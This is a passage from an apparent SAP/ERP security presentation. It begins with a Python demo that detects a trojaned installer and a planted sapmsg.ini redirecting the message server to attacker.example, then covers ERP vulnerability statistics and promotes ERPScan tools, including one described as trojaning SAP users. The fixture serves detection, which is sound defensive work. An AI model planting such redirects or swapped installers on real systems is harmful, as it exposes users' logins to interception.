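    access swaps the installer and drops a sapmsg.ini pointing elsewhere."""
    with tempfile.TemporaryDirectory() as share:
        write(share, "SetupAll.exe", b"original installer bytes")
        write(share, "saplogon.ini", b"[MSSysName]\nItem1=PRD\n")
        trusted = build_manifest(share)
        write(share, "SetupAll.exe", b"trojaned installer bytes")
        write(share, "sapmsg.ini", b"[Message Server]\nPRD=attacker.example\n")
        return verify_share(share, trusted)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

The manifest itself must live somewhere the share's users cannot write, otherwise an attacker simply updates it alongside the trojaned file; the same comparison applies to the SAPGUI installation published through terminal services.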
57. Enterprise Application Vulnerability Statistics 2009
"This document will show the result of statistical research in the Business Application security area made by ERPScan and the OWASP-EAS project. The purpose of this document is to raise awareness about Enterprise Business Application security by showing the current number of vulnerabilities found in these applications and how critical they can be"
• Analyzed systems
– ERP systems
– Business frontend software
– Database systems
– Application servers
• Analyzed resources
– http://securityfocus.com, http://exploit-db.com
– http://cwe.mitre.org, http://cvedetails.com
– http://oracle.com, http://sdn.sap.com, http://ibm.com
61. Growing interest
• The number of found vulnerabilities grows – greetings to all companies in the application security area
• The number of talks about ERP security at conferences grows – 2006 (1), 2007 (1), 2008 (2), 2009 (3), 2010 (10!)
• Companies also pay more attention to this area – the SAP security response team is growing every year
This area is becoming popular. We really need automatic tools for ERP security assessment, for pentesters and for administrators
62. Need for Automation
What we have done:
• Sapsploit and Sapscan – tools for pentesting and trojaning SAP users
• ERPSCAN Online – free service for assessing SAP frontend security
• ERPSCAN Security Scanner for SAP – enterprise application for solving the full range of problems in SAP solutions
63. ERPSCAN – Security Scanner for SAP
• Corporate scanner for assessing the security of SAP systems
• Checks for misconfigurations, public vulnerabilities, 0-days, compliance with standards and metrics
• Checks both ABAP and JAVA instances, more than 400 checks
• Whitebox scanning to prevent possible damage
• Additional engine for checking existing vulnerabilities without exploiting them
• Extended knowledge base for all checks with detailed descriptions and countermeasures collected by ERPScan experts
• ERPSCAN.COM
64. Conclusion about ERP Security
• ERP security is not a myth
• It is becoming more popular with BlackHats and WhiteHats
• There is a need to create guidelines and increase awareness in this area
• OWASP-EAS calls for volunteers with a background in this area
• ERP security is very complex, and if you are ready to do it 24/7 then do it
• If you cannot, leave it to professionals